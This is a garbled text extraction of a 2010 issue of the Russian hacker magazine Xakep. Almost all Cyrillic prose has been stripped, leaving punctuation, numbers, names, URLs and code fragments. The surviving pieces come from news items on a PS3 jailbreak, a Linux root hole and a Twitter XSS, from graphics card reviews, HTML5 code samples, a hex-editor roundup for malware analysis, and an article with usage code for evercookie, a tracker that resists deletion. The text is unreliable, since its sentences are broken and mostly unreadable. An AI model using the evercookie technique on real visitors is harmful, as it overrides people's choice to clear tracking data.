Хакер 2010 11 PDF

.
50
x 11 () 2010
.
210
:

11 (142) 2010
/ ,
HTML5?
. 26
142
ZEUS
METERPRETER
CHAOS CONSTRUCTIONS 2010:

CISCO

TCL
. 64
INTRO

.
/ whitehat-
,

, ,
,
.
4000%, cyber crime
,
ring0 nginx,
$15k
30-40 .
-.
,

: 30 , 10.
:
,
,
.
,
,
,
- , ,
.
,
,
, , ,
, ,
.
,

.
5 :
1. cyber crime
2.

3.

4.
- .
.
nikitozz, . .
udalite.livejournal.com
http://vkontakte.ru/club10933209
CONTENT
MegaNews
004
FERRUM
MALWARE
076
- :
082
Zeus
Nod32, Avast, Avira:
086
Chaos Constructions 2010

016
018
Synology DSM?
092
BSD
020
096
ASUS U35Jc
NAS
PC_ZONE
025
026
HTML5:
032
Hex- vs. malware
036
Cookie,
102
Windows Filtering Platform
106
, ?
110
OpenGL iPhone
114
Portable-
LiveCD BSD-
3D- iPhone SDK
64-
SYN/ACK
040
Easy-Hack
118
044
122
050
126
055
Meterpreter
060
Windbg
064
Cisco
068
074
X-Tools
MSF
TCL
VMware View 4.5:

Linux
132
PSYCHO:
138
FAQ UNITED
141
144
WWW2
, : , ,
?
FAQ
8.5
web-
BANK
CLIENT
050
076
- :

Nod32, Avast, Avira:

082
106
Zeus

, ?
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN/ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)
Dr. Klouniz
(alexander@real.xakep.ru)
>

> xakep.ru
(xa@real.xakep.ru)
/ART
>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)
/DVD
>
Step
(step@real.xakep.ru)
> Unix-
Ant
>

/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824

> GAMES & DIGITAL
(goryacheva@gameland.ru)
>

> Gameland TV

(rumyantseva@gameland.ru)
>
(strekneva@gameland.ru)
>

>

>
(ashomko@gameland.ru)
> -
(alekseeva@gameland.ru)
>

(korenfeld@gameland.ru)
>

/:
/ .: (495) 935-4034, : (495) 780-8824

>
(kosheleva@gameland.ru)
>

(goncharova@gameland.ru)
>
(lukicheva@gameland.ru)
> :

,
: claim@gameland.ru.
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

. :

. ,

,
.
.

.
.

:
content@gameland.ru
, , 2010
MEGANEWS
Mifrill mifrill@real.xakep.ru
MEGANEWS
PS3
, Sony PlayStaiton 3,
, ,
USB- . . ( ),
Sony ,
, , 3.42. ,
: .
USB- , .
, ,
... . Nokia N900,
Palm Pre, Android , ,
Apple.
, ? :
TI-84 Plus :). , ,
- http://brandonw.net/ps3jb
FAQ. ,
http://psx-scene.com.
Forbs,
. 17- .
$54 .
,
, , . ,
IT- , DEFCON,
BlackHat HITB. ,
... . , , ,
, MalCon
(www.malcon.org). FAQ MalCon . ,
, -
IT-
. , ,
, , , . FAQ
, ,
:).
.
004
X 11 /142/ 10
MEGANEWS
-
IT 64- Linux- root-,

(
32- ). , .
,
! ,
2008 ,
, , .

64- . ,
seclists.org/
fulldisclosure/2010/Sep/268. Ubuntu, Slackware,
Gentoo, Mandriva, openSUSE, Fedora Debian.
RHEL CentOS 3
4 ( 5.x!), RedHat,
,
.
Open Office .
12 .
APP STORE INTEL

IDF (Intel Developer Forum) 2010
Intel , AppUp
Atom. , - , , ,
www.appup.com. ,
,
AppUp Center .
, Intel : AppUp
Center . , AppUp ,
( 23 000 ).
, 24- ,
, .
Windows MeeGo Linux, ( , ).
Intel
,
Atom .
DELL
Dell
,
IDF 2010 Dell Inspiron Duo.

,
Inspiron
Duo , (!)
, .
180 ,
, . Windows 7
, ,
: Intel Atom
N550 (1,5 ), 2 , HDD
SSD 160 32 . , ,
Dell ,
.
006
X 11 /142/ 10
MEGANEWS
3D
, Apple,
. , .
, ,
,
3D. i-Station
Z3D, , , 7-
(800x480) . ,
, ,
3D , , . Google Android 2.1,
, Z3D : Telechips 8901 720 , 256 , Wi-Fi 802.11b/g Bluetooth, FM-, TV-,
Full-HD. :
32 , 64 .
, $500.
.
PandaLabs , 25%
USB-.
IOS

Apple,
. Apple
4.1
iOS,

. Apple -
:
, , , ,
, .
, - . ,
Dev-Team, ,
4.0.2. , 4.0.2 , :). Dev-Team

, iOS 4.1.
,
ROM! Dev-Team , Apple
,
.
GoogleTV.
, YouTube,
, .
2.0

,
.
DEMO
Dynamics.
: MultiAccount Hidden.
,
. , MultiAccount ,
.
.
, ,
. (Hidden)
008
. 10 16 ,
.
, (
).
,
. , , ,
.
X 11 /142/ 10
MEGANEWS
$50

, Engaget
Intel . , :
, . ,
Intel ,
Upgrade Card
.
Intel G6951 ( ,
Hyper-Threading, -).
50
. - , Intel
,
:).
id Software 5
: Doom, Quake, Quake 2, Wolfenstein, Return to Castle Wolfenstein
HDCP
HDCP High-bandwidth Digital
Content Protection,
, Intel. HDCP

,
DVI, DisplayPort, HDMI, GVIF UDI.
.
,
HDPC Master Key HDMI, Intel
, , . Blu-ray-,

.
010

, SMS, e-mail, Twitter .
QWERTY , qwerty-
-.
TFT- 2.4" 320240.
: Li-Ion-,
760 , 6,2 . QWERTY
Bluetooth 2.0, USB microSD 16 (
16 ). FM-, ,
Java. 3G, WiFi
, .
3490 3990 ( , )! , QWERTY
.
, -,
-
,
source- sink-
.
Blu-ray-
HD- ( )
. , Intel ,
,
-
,
HDCP- HDCP-.
, , Intel

-
.
, HDMI Master Key
rudd-o.com/en/monopolies-of-the-mind/
the-hdcp-master-key.
X 11 /142/ 10

N- NOKIA
.

, -,
.

NOKIA N8,
SYMBIAN^3? .
, , , ,
. N8 ,
, Nokia.
-
, . (113,559,1212,9)
135 ,
. ,
. Nokia
, . ,
, .
, - .
3.5" 640360
, AMOLED 16,7 . .
N8 ,
. Nokia,
. , . ,
: N8 .
ARM11 680 .
Nokia, N8 256
128 . 16 ,
mircoSD 32 . .
Symbian^3
N8 Symbian^3.

. :
,
.
, .
Symbian^3 .
.
, (, Wi-Fi ), ,
RSS, . .
, ,
. ,
. 12 (!)
Carl Zeiss. 720p,
:
. N8
.
HDMI Mini, HDMI. , . ,
HDTV- 720p 5.1 . , N8
OpenGL 2.0,
: avi, mkv ..
. . -
Nokia N8:
, N8
Symbian . Symbian^3
.
Ovi.

. Wi-Fi
802.11n Bluetooth 3.0.
390
720 , .
N8
12 .
11
MEGANEWS

- , Apple
.
iPod Shuffle, Nano Touch,
. ,
Nano ( 46%
42%), Clickwheel, ,
.
- Retina 1.54" . ,
Apple , iPod Shuffle Nano
, , .
, ,
(
). Nano ,
$149 8 $179 16 .
iPod Touch.
iPhone, -, , , A4 Retina (IPS-
960x640 ), , iPhone 4. Touch HD-. ,
, : 8
$229, 32 $299 64 $399
.
. iPod Shuffle,
,
,
,
. Nano

VoiceOver.

: -
15 . Shuffle
2 . $49.
iPod Apple Apple TV. ,
A4. Apple
TV ,
iTunes,
Netflix, YouTube, Flickr MobileMe.

, iPad, iPhone
iPod Touch,
, ,
.

Apple TV. $99.
9 Google 24 .
.

,
, .
,
012
, .

(Combating Online Infringement and Counterfeits Act).
,

.

,
torrents.ru rutracker.org.
, ,
.
, , : , .com, .net .org ,
. ,
,
- (
).
X 11 /142/ 10
,
Damballa,
,
. ,
, -
. Damballa , IMDDOS. ,
IMDDOS 10 000. ,
IMDDOS .
, ,

,

,
, , ,
DDoS . .
, : http://www.imddos.org :).
, Network box, ,
(13,74%)
(11%).
!
,
, ,
. ,

, , 1273. ,
, 1273
.
:

.
,
, . ,
,
.

, , ,
(c, , ,
?). , 1270
: , ,
.
10 . 5 . .
. , ,
,
,
. ,
.
! 5.0 Skype -
,
P2P- VoIP-
. .
. , ,

SMS
. ,
IT
( ).
, ,
,
, .
, ,
.
,
.
X 11 /142/ 10
500 .
, , , (
, ).
,
20 , 10
, ,
, , ,
,
SMS. ,
SMS 300 1000 ,
,
.

159 () . 273 (
).
013
MEGANEWS
XSS-
TWITTER

Twitter,
( ) ,
.
,
Twitter.

( ).
,
, -
.

. XSS-

JavaScript,
onMouseOver.
(,
),
, ,
. ,
,

100 .
. ,
Twitter
, -
, , , .
ARM-
Marvell ,

ARM-
USB 3.0. ,
Marvell Armada 628. 1,5 , ,
1 ,
LP-DDR2 DDR3 ( 533 ). ;
, Armada 628
USB 3.0. ,
ARM v7 MP ,
, .
, , .
,
. , Android,
Linux, Windows Mobile RIM OS,
Armada 628 2011 .
IBM,
Sun 24% .
Microsoft 23,3% Mozilla 21,3%.
ANDROID MARKET
IT- Google.
Android OS
Android Market . ,
( )
,
. Android Market 80 000 ,
61,4% , .
, Google ,
, Android
12 (
14 ), ,
, , , .
Google ,
.
014
X 11 /142/ 10
FACEBOOK-

(Ronald K. Noble),
INTERPOL
Information Security Conference. ,
, ,
, Facebook
, . ,
DDoS-, , , ,
.
. Security
Incident Response Team

Facebook-,
.
,
,
Infra Red.
,

, ,
.
,

. ?..
-
Digg 34%,
26%.
X 09 /140/ 10
015
FERRUM

ASUS U35Jc
13
. ,
. ,
.
- Visual Studio,
. : 13
ASUS U35Jc.
ASUS U35Jc . , ,

, , :
, ,
, .
, -
016
.
, ,
.
, ,

,
.
13.3" LED 1366768 , -
720p-. ,
.
, , ,
. ,
,
.
, .
X 11 /142/ 10
: Intel Core i3-370M 2,4 GHz

: 2.5 / 3 Mb L2 Cache
: 2
: 640
: 25x322x233
: 1.9
: 13.3 1,366x768
: nVidia GeForce 310M, 1024 , . : Intel GMA HD
: Intel High Definition Audio
: LAN 10/100/1000
: Bluetooth 2.1 + EDR, WiFi (802.11a/b/g/n)
: 3xUSB(2.0), Kensington security, Line-out, HDMI, Mic-in, VGA
: Card Reader (SD/MMC/MS/Pro/xD)
: Li-Ion 5600 ( 8.0 )
.
, -
, . ,
.
, , Wi-Fi-.
,
.
, , :). . , . - ASUS Express Gate
(, , , ,
..) .
ASUS U35Jc Mobile Intel

HM55 Express. , ASUS U35Jc
Intel Core i3
Core i5 2,4 GHz. Core i5
Intel Turbo Boost ,
. ,
. , ASUS
Super Hybrid Engine (SHE),
, 10%.

DDR3 2 4 , 320
640 .
, 3 USB-
. :
(nVidia GeForce 310M) (Intel GMA HD). nVidia Optimus
. , ,
.
,
8 . , . 5600
? , Battery Eater (batteryeater.com).
,
. ,
.
, ?
, : GeForce 310M ,
Call Of Duty 4 . , , .
X 11 /142/ 10
nVidia CUDA,
. ,

, CUDA, . ,
,
.
Extreme GPU Bruteforcer (www.insidepro.com/eng/egb.
shtml). , MD5-
411 ,
.
, : , . U35Jc
, :
, , . , , nVidia Optimus
(,
802.11n).
(Bluetooth, WiFi, LAN)
. Altec Lansing
SRS Premium Sound
,
. , , ,
,
.
ASUS
trendclub.ru. Trend Club , . Trend Club ,
, . Trend Club Intel ASUS
.
Intel,
, , ,
.
Intel Web-
Intel http://www.intel.ru, http://blogs.intel.com. Intel www.intel.ru/rating.
017
FERRUM

Synology
DSM?
NAS

NAS Synology, DSM

Synology,
. , Linux,
RAID,
. Synology DS210+ ,
. NAS
,
.
, NAS ,
, . ,

.
NAS,
.

, NAS.
,

Synology Disk Station Manager.
Torrent-
, NAS
. ,
,
018
074
, NAS?
-, BitTorrent-
Linux ,
. ...
:
NAS Synology, DS210+, Download Station.
, ,
-.
,
NAS,
.
NAS .
(BitTorrent,
HTTP, FTP), ,
,

. , ,
Download Station 2 ,

. ?
NAS -
,
.
! :) , ,
, ,

,
.
,
IP-,
X 11 /142/ 10
- NAS
DSM 2.3
. IP- ,
.
, Dynamic DNS-. ,
,
(, myserver.
dyndns.org) IP- .
,
DDNS-
IP-, . DDNS , NAS Synology
. DDNS-
(, dyndns.org) DSM.
NAS
IP,
, DDNS-.
, ,
, ,
. .
,
NAS - .
NAS , .
Synology DS210+, Web Station.
DSM -,
PHP- MySQL. Synology
, ,
,
Web Station. DS210+ , -
, , . ,
, ,
( www.synology.com/
enu/apps/index.php).
Webalizer.
MySQL phpMyAdmin.
psk-,
DSM
.

, . , Synology
.
, . - (, )
forum.synology.com , X 11 /142/ 10
PSK-. The Underground

(Modders here!), , .
: ,
, ( Subversion), ..
, PSK
.
IPGK. , IPGK-. ,
, mc
.
, , .

, , NAS Synology Photo Station.
-, , ( , photo).

,
.
: , , , . ,
NAS USB-,

.
IP-, .
IP- , IP-, NAS. , NAS Synology,

.
Synology Disk Station Manager - Surveillance Station. ,
, USB -
IP-.
Wi-Fi ,
, , :
, , .
, Disk Station Manager
2.3. , - DSM 3.0, ,
28- 2010
DSM 3.0 . ,
.
NAS Synology.
019
FERRUM

, : 2.66, INTEL CORE I5-750
HIS HD 5850 ICOOLER V

HIS HD 5870 ICOOLER V TURBO X
HIS HD 5970
INNO3D GEFORCE GTX 470
INNO3D GEFORCE GTX 470 HAWK
INNO3D ICHILL BLACK SERIES GEFORCE GTX 480
: GIGABYTE GA-H55N-USB3
, : 22, OCZ DDR3 PC3-12800, 1600 , GOLD
EDITION
, : 80, SAMSUNG 80G SPINPOINT S166
SATA
, : 1000, CORSAIR HX1000W
: WINDOWS 7

, , ,
. ,
, ,

.

, , ,
. 3DMark 2003 Heaven Dragon ( DirectX 11,
). 19201080 ,
, .
(
19201080 . Resident Evil 5 S.T.A.L.K.E.R.:
, ,
RE5 , .
Dark Void, Batman: Arkham Asylum Street Fighter IV
AF .
Fermi,
NVIDIA, . ,
NVIDIA GeForce GTX 480 GPU 700 , 1401 , 924 (3696) .
, , 384 . -
020
, . ,
105 , .
, , 600 ,
, .
. NVIDIA GeForce GTX 470.
, ,
. 320 .
NVIDIA GeForce GTX 465
256-. , .
, NVIDIA , Hi-End-, . ,
, .
, , , ATI
PhysX, , ,
.
X 11 /142/ 10
10000 .
13500 .
HIS Radeon HD 5850

iCooler V
HIS Radeon HD 5870

iCooler V Turbo X
, : 40
, : 725
, : 1000 (4000)
, : 1024
, : 256
: GDDR5
DIRECTX: 11
,
. ,
( , ).
.
, . ATI Radeon HD 5850,
(725 1000 ). ,
ATI . , , ,
, ,
-.
. .
NVIDIA, ,
- HIS Radeon HD 5850
iCooler V.
X 11 /142/ 10
, : 40
, : 900
, : 1225 (4900)
, : 1024
, : 256
: GDDR5
DIRECTX: 11
, , HIS. ,
: (2,15 ), (1600)
(80). ,
-
50 ,
. , (
) . , HIS
Radeon HD 5870 iCooler V Turbo X , . , ,
, - . HIS
Radeon HD 5970 , ,
.
.
, . ,
, NVIDIA PhysX
?
021
FERRUM
21000.
HIS Radeon
HD 5970
:
, : 40
, : 725
, : 1000 (4000)
, : 2X1024
, : 2X256
: GDDR5
DIRECTX: 11
, ( )
, . , ,
ATI. ,
.
, .
, , ,
, .
CrossFire
,
. ,
, ,
. ,
,
.
022
11000 .
Inno3D GeForce
GTX 470
:
, : 40
, : 607
, : 837 (3348)
, : 1280
, : 320
: GDDR5
DIRECTX: 11
,
?
, ,
, . ,
, . ,
320- ,
1280 GDDR5 ,
. , , ( , ,
, ),
. DirectX 11- Heaven Dragon.
. -,
90 . ,
,
Inno3D GeForce GTX 470 .
, .
X 11 /142/ 10
Inno3D GeForce
GTX 470 HAWK
:
, : 40
, : 630
, : 873 (3492)
, : 1280
, : 320
: GDDR5
DIRECTX: 11
, ,
- .
, ,
FPS . 68
!
, 23 , 36 45 .
, , ,
Inno3D GeForce GTX 470.
26 ,
.
. ,

.
-
. ,
X 11 /142/ 10
Inno3D iChiLL Black Series

GeForce GTX 480
:
, : 40
, : 720
, : 930 (3720)
, : 1536
, : 384
: GDDR5
DIRECTX: 11
,
. ,
Inno3D, Inno3D iChiLL Black Series GeForce
GTX 480.
.
, , 65 ,
.
, .
,
. . ,
.
. , ,
, , .
HIS Radeon HD 5970 ,
Inno3D GeForce GTX 470.z
023
FERRUM
3DMark03,
Heaven Dragon, FPS
HIS HD 5850 iCooler V

HIS HD 5870 iCooler V Turbo X
HIS HD 5970
Inno3D GeForce GTX 470
Inno3D GeForce GTX 470 HAWK
GeForce GTX 480

HIS HD 5970
GeForce GTX 480
2000
4000
6000
8000
10000
12000
10
20
30
40
50
60
DirectX 11 , ,

Street Fighter IV, FPS
S.T.A.L.K.E.R.: , FPS

HIS HD 5970
GeForce GTX 480

HIS HD 5970
GeForce GTX 480
50
100
150
200
250
300
350
10
20
30
40
50
60
70
,
ATI Radeon
Dark Void, FPS
Resident Evil 5, FPS


HIS HD 5870
Inno3D Black Series
GeForce GTX 480
HIS HD 5870
Inno3D Black Series
GeForce GTX 480
0
50
100
150
200
250
ATI HIS
350
85
90
95
100
80
105
-
HIS Radeon HD 5970
Batman: Arkham Asylum, FPS

HIS HD 5870
Inno3D Black Series
GeForce GTX 480
0
50
100
150
200
250
024
70
X 11 /142/ 10
PC_ZONE
Step twitter.com/stepah
Portable-
][
Portable , ,
,
,
,
.
Thinstall.
VMware,

VMware ThinApp.
, ThinApp
,
. ,

. , ; ,
, ,
,
.

.EXE-.

,
, DDL,
,
,
.
,

. , ThinApp
,
$6050. ,
? , , ,
,

.
Cameyo (www.cameyo.com)
, ThinApp, . ,
VMware .
,
,
Cameyo.
1,5 :
,
.
(Capture installation)
(snapshot)
025
,

.
snapshot , Cameyo ,
Portable. Opera,
Flash- ,
Java-. ,
, ;

( ).
,
Install done.
Cameyo
, ,
, Portable-.
,
Package successfully
created.
, , .
EXE
Windows- ,
, . -
. ,
,

. ,
Opera 10.62 139 .
:
, ,
Cameyo ,

. ,
Opera Dropbox,
15 , . , ,
Cameyo, ( )
Edit existing package.
Files Registry ,
.

, - .
General Isolation Mode.
Portable-

.

Full Access,
, .
Cameyo, SDK .
API ,
.
,
, , .. ,
. z
Portable-
Comeyo
,
Install done

X 11 /142/ 10
PC_ZONE

HTML5
HTML5
HTML5:
,
.
, , ,
- ,
.
HTML5.
, ! ,
, ,
,
. : , , .
, ,
, .
HTML
,
-, , . HTML4 ,
,
. Macromedia, Adobe,
Shockwave, Flash. Flash ,
026
, , - .
JavaScript Flash (, -
),
. , YouTube, Facebook
. ,

.
HTML
: ,
, Flash/
Silverlight/JavaFX. -
X 11 /142/ 10
, 3D,

canvas
.
, , .
Flash Silverlight.
HTML4.
, HTML5.
,
,
. ,
.
, 2D- 3D-, , ,

JavaScript.
- , . HTML5
. HTML ,
CSS JavaScript.
,
(-) .
, -
, ,
.
(, YouTube).
JavaScript Flash ,
,
(, ,
..). . HTML5 ,
,
<video> . , .
, , , HTML5.
HTML5, ?
- ,
,
JPEG/GIF/PNG,
. Flash
, ,
.
HTML ,
. ,
X 11 /142/ 10
HTML5
. Canvas HTML5. ?
, ,
, , , .. JavaScript.
DOS , , ,

. - .
, , Flash, -, .
canvas:
function draw(){
var canvas = document.getElementById("canvas");
if (canvas.getContext) {
var ctx = canvas.getContext("2d");
ctx.fillStyle = "rgb(200,0,0)";
ctx.fillRect (10, 10, 55, 50);
ctx.fillStyle = "rgba(0, 0, 200, 0.5)";
ctx.fillRect (30, 30, 55, 50);
}
}
<body onload="draw();">
<canvas id="canvas" width="150" height="150">
</canvas>
</body>
Canvas, , .
,
VML Microsoft
SVG Mozilla Safari.
, .
Canvas . ,
,
.
, GPU. Google Chrome IE
9beta canvas DirectX API.
, ,

- , ,
- ,
027
PC_ZONE
. -...

,
HTML5 CSS3
. , IE
.
JavaScript-,
, .
. , ,
. Cookies
, ,
,
.
4 ( )?
HTTP-,
.
WebStorage DOM Storage , . , -,
,
( ,
).
, ,
,
. ? , IE
10 , Firefox 5 . ,
Microsoft
, , ,
. , IE8 ,
, ,
. session,
( ,
), local , , ( ).
, ,
NoSQL ( )
. (set), (get) (remove)
, ,
, .
(clear) (length).
,
JavaScript. , :
window.localStorage[myfriend] = JSON.stringify(
[{name:,email:vasja@xakep.ru}, {name:Alex,
email:aleks@xakep.ru}]);
028
HTML5?
HTML5 ,
.
-, , ,
. , , , ,
, !
HTML5 . ,
, ,
HTML5- ,
. , - Flash, -
CSS, .
.
,
,
,
HTML5 Boilerplate,

. ,
,
Modernizr,
API
body. ,
, .

Raphael, , , .
SVG, VML,
. canvas
exCanvas, IE7
, .
Sessionstorage ( ,
WebStorage API)
jStore ( jQuery), API,
.
YouTube (, , PornTube )
Video for Everybody,
<video> JS- Flash. ?
WebForms2, .
WebSocket , . web-sockets-js
JS- Flash. ,
.
, easyXDM.
CSS 3,
selectivizr css3pie, .
X 11 /142/ 10
<html>5doctor
HTML

.
W3C, HTML5. ,
, ( )
, ,
Web SQL Database
SQL ( SQLite).
? , !
,
C
, , .

. , , . , , ?
, ,
.
, . ,
, :
. HTML5
offline/online, .
, ,
,

(DOM Storage)
, ,
, ,
.
,
, , HTML5
!
document.body.addEventListener("offline",
function () {
alert(', ,
!'));
}, false);
,
, ,
? .
application cache offline
resource. , ()
, ,
. X 11 /142/ 10
CSS3 !
,
. , ,

. Firefox 3.5 .
Web Workers ,
,
, 4-
8 !
Flash, . : JavaScript
.
(
Chrome,
). ,
,

. ,
XMLHTTPRequest,
,
. ,
, ,
, ?
,
.
, , .
WebWorkers,
Google Gears. ,
(
),
,
, DOM-
. , ( ).
DOM-
, .

,
HTTP://WWW
links
,

,

HTML5:
www.html5rocks.com
3D
WebGL:
learningwebgl.com/
blog
HTML5
CSS 3
:
www.findmebyip.com/
litmus

HTML5:
www.w3schools.
com/html5/html5_
reference.asp

WebWorkers:
http://webo.in/
articles/all/2009/25computing-with-webworkers
029
PC_ZONE
Modernizr ,
HTML5
Google Chrome 3D WebGL
( JSON-).
:

, , FileReaderAPI,
(,
).
Firefox, API
.
, , , WebSockets (
, TCP-),
( ). ,
(
IE9). WebSockets
,

- .
90- 3D- .
( VRML), ,
(Blink 3D, Wildtangent)
Java (Java3D) Flash.
, - ,
( ) ? .
OpenGL (
, Doom Quake)
API
JavaScript. WebGL, Chrome. , canvas, : , .
.
API
3D JavaScript !
; ,
, .
, ,
CopperLicht.
var worker = new Worker("my_xaking_script.js");

worker.onmessage = function(event) {
alert(Computing finished, result: + event.
data)
};
worker.postMessage("5");
( my_xaking_script.js) JS,
DOM,
, onmessage, , .
postMessage,
.
,
, RPG-, ,
Flash .
,
, ,
(,
JavaScript NodeJS). Firefox,
JS, WebWorker .
, JavaScript-
, jQuery, C JavaScript SHA-1 ( , Ruby- Engine Yard).
DVD, . ,
, .
, ?
, HTML5 ? ,
. , - (Drag-n-Drop)
. IE (
-?), - , .
HTML5 , Drag-n-Drop
, DOM- CSS .
,
, .
Google Chrome,
Gmail DragnDrop. ,
030
HTML5 . , , , C++ . , , ,
.
, ,
. HTML5,
-.z
X 11 /142/ 10
:
?

PlayFast
. . . Playfast, ,
. ,
,
. ? ?

. -, -
: , .
-,
, . , -,
, ,

5-15% .
.
, ?
,
, .
Playfast ,
. ,
,
PlayFast.
. ,
, ( ,
). ,
,
, .
, ,
.
PlayFast .
, ,
. (Windows Vista/XP/7).
-
, , ,
.

, .
Playfast .
,
. , .
.
,
( ).

,
. ,
X 11 /142/ 10
PlayFast
.

.
, , ,
,
.
, ,
.
-.
,
( ),
, .
, .
, : ,
.
PlayFast- -, .
,
.
- ,
, , . ,
, , . -
,
Playfast. ,
. .z
031
PC_ZONE

DVD

DVD-
Hex-
vs. malware

hex. , ,
,

. ,
,
, . .
HEX-
,
. . .
, ,
, ,
. -
032
ASCII Unicode , ,
. ,
,
.

(, PDF).
X 11 /142/ 10
INFO
info
010 Editor:
Hex Editor Neo:
McAfee FileInsight
. Freeware ,
HEX-,
.
. Hex Editor
Neo ,
.
, ,
. ,
NTFS-, , ,
.
,
VBScript JavaScript. ,
,
x86, x64, .NET-!
,
. ,
, FileInsight? , . FileInsight
.
, , , Hex
Editor Neo
ASCII Unicode-.
x86
, . .
FileInsight hex- Windows

McAfee Labs. , , ,
,
. ,
.
, FileInsight Windows (PE ),
OLE- Microsoft Office. ,
x86 .
,
, FileInsight
.
,
. ,
,
. :
struct ANIHeader {
DWORD cbSizeOf; // Num bytes in AniHeader
DWORD cFrames; // Number of unique Icons
DWORD cSteps;
// Number of Blits
};

. ,
.
, , (xor, add, shift, Base64 ..):
-.
,
,
-, .
JavaScript
Python, . ,
FileInsight
, . ,
400-500 ,
Failed to open document.
Hex Editor Neo

HDD Software: X 11 /142/ 10
FlexHex
FlexHex hex-
Heaventools Software, , Hex Editor Neo.
, ,
.
, OLE-,
NTFS-.
, FlexHex ,
. ,

: , -
.
. FlexHex
, (undo-list )! FlexHex
, HEX-

?
.

-
hexpaste.

(, hexpaste.com/
WvwX04eV),
- .

.

AJAX',
,
,
.
HTTP://WWW
links
FileInsight:
vil.nai.com/vil/
averttools.aspx
Hex Editor Neo:
www.hhdsoftware.
com/free-hex-editor
FlexHex:
www.flexhex.com
010 Editor:
www.sweetscape.
com/010editor
Hiew:
www.hiew.ru
Radare:
radare.nopcode.org/
new
033
PC_ZONE
FlexHEX
hex-
McAffee Labs
Hiew
, ASCII Unicode-.
,

. hex-,
- FileInsight. OLE-, . OLE, The docfile has been corrupted.
010 Editor
010 Editor ,
SweetScape Software.
, :
,
,
,
( 140 ).
010 Editor , .
,
(
Binary Templates). . ,
.
.
(PE
), - Windows (LNK), Zip-,
Java- .
,
Didier Stevens 010 Editor PDF.
PDF-, ,
-. , C- , ASCII, EBCDIC, Unicode-

.
Hiew
Hiew, ,
. ,
. , , .
(PE), Linux (ELF).
x86-64 .
ARM. ,

. ,
API (Hiew Extrenal Modules).
034
radare hex- unix

, Hiew DOS , . .
Radare
Radare Unix-,
HEX-. hex-
(radare) .
,
(ELF), (PE).
Radare
(radiff) /.
(rasc).

. , ,
GUI-
, ,
. ,
, ,
Python-.
hex-, .
FileInsight,
( ) . 010 Editor
, PDF. -, .
; , , . Unix, , , Radare. ,
- , .
Hiew, , , ,
. , Hiew
,
( ). Hex Editor Neo,
, x86, x64 .NET . z
X 11 /142/ 10

DNS?
,
DNS
- .
, 53
, DNS.
www.xakep.ru,
IP- . .
DNS.
DNS
SkyDNS (www.skydns.ru) , DNS

.
-
. ?
,
DNS ( ,
). SkyDNS, ,
. DNS
.
, , ,
, .
SkyDNS
. , ,
, -.
, DNS
, - (
, DNS
), . ,
, SkyDNS.
: ,
, . ,
,
.
( 5 ),
, . , , : - , .
- .
, SkyDNS , ,
, . ,
X 11 /142/ 10

. !
, ,
, .
:
, .

, :).
-,
, .
,
,
SkyDNS . ,
SkyDNS ,
, , ADSL-, .
IP-,
( ), .
, ,
, ( !).

. z
035
PC_ZONE
Step step@glc.ru
DVD
evercookie

Cookie,

Cookies , -
,
. ,
, . .

, VPN,
HTTP-,
, ,
, -
, . , ,
-
.
, -
, ,
. , -
? .
.
, . Cookies ( . )
, . (
), ,
036
cookies,
- . , - cookies
,
, .
, - .
. , - HTTP-.
, www.example.org/index.html
www.example.org
:
GET /index.html HTTP/1.1
Host: www.example.org
,
, HTTP-.
:
HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: name=value
X 11 /142/ 10
Flash
cookie evercookie
Set-cookie,
name=value ( = )
:
, -
, .
- Flash cookie
( , 100 ), ,
.
LSO
. :

, Flash-? ,
. ,
, FlashCookiesView (www.nirsoft.
net/utils/flash_cookies_view.html) ,
Flash.
,
,
( ).
GET /spec.html HTTP/1.1

Host: www.example.org
Cookie: name=value
Accept: */*
.
,
. ,
,
. ( ),
.
, ,
.
,
. , ,
,
...
, ,
.. - ,
,
.
.
Flash-
, HTTP ,
, ,
. ,

Flash ( ,
). LSO
(Local Shared Objects) cookies
,
.
(
), :
- Flash-
( cookie, ). ,
, , , X 11 /142/ 10
LSO
- , ,
( ), . , HTML5 (Session Storage, Local Storage, Global
Storage, Database Storage via SQLite),
HTML5: .
Samy Kamkar.
JavaScript-
evercookie, ,
.
- : ?.
: ,
, .
Tracking
cookies
. Evercookie
.
, evercookie
: HTTP, LSO, HTML5. ,
,

. : PNG-,
history ,
ETag, userData Internet
Explorer , - .
INFO
info

flash cookie,
.

www.macromedia.
com/support/
documentation/ru/
flashplayer/help/
settings_manager07.
html.
,
LSO.
037
PC_ZONE
,

evercookie
, ,
http://samy.pl/evercookie.
Click to create an evercookie,
. ,
. , :
, ?. , ? , .
Click to rediscover cookies. WTF?
- , .
? ? .
PNG
, Evercookie,
PNG. evercookie , evercookie_png.php HTTP
, ,
.
PHP-, PNG-,
RGB ()
. PNG- :
20 .
, evercookie HTTP-,
PHP-, . , , PNG .
HTTP- 304 Not Modified,
. HTML5 Canvas.
, evercookie
Canvas, RGB- , , ,
. , .
Web History
. , evercookie Base64 , .
, ,
bcde Base64. URL:
google.com/evercookie/cache/b
google.com/evercookie/cache/bc
038
google.com/evercookie/cache/bcd
google.com/evercookie/cache/bcde
google.com/evercookie/cache/bcde-
, URL history.
CSS History Knocker,
JS- CSS ,
( samy.
pl/csshack). evercookie
Base64 google.com/evercookie/
cache, a ,
. URL-,
, .
. , . history
. ,
, URL -. Base64 .
, ?
, ?
evercookie ,
, ,
10.
,
. ,
, LSO,
HTML5-, ,
, PNG
web history. evercookie
,
, .
. , , .
Local Shared Object .
Evercookie ,
, . .
JS-,
evercookie. Flash- (Local Shared
Object), evercookie.swf,
X 11 /142/ 10
Chrome
, PNG- ETag, PHP-

evercookie_png.php evercookie_etag.php.
evercookie , :
<script type="text/javascript"
src="jquery-1.4.2.min.js"></script>
src="swfobject-2.2.min.js"></script>
src="evercookie.js"></script>
<script>
var ec = new evercookie();
// cookie "id" "12345"
// : ec.set(key, value)
ec.set("id", "12345");
// "id"
ec.get("id", function(value) {
alert("Cookie value is " + value)
});
,
callback-. :
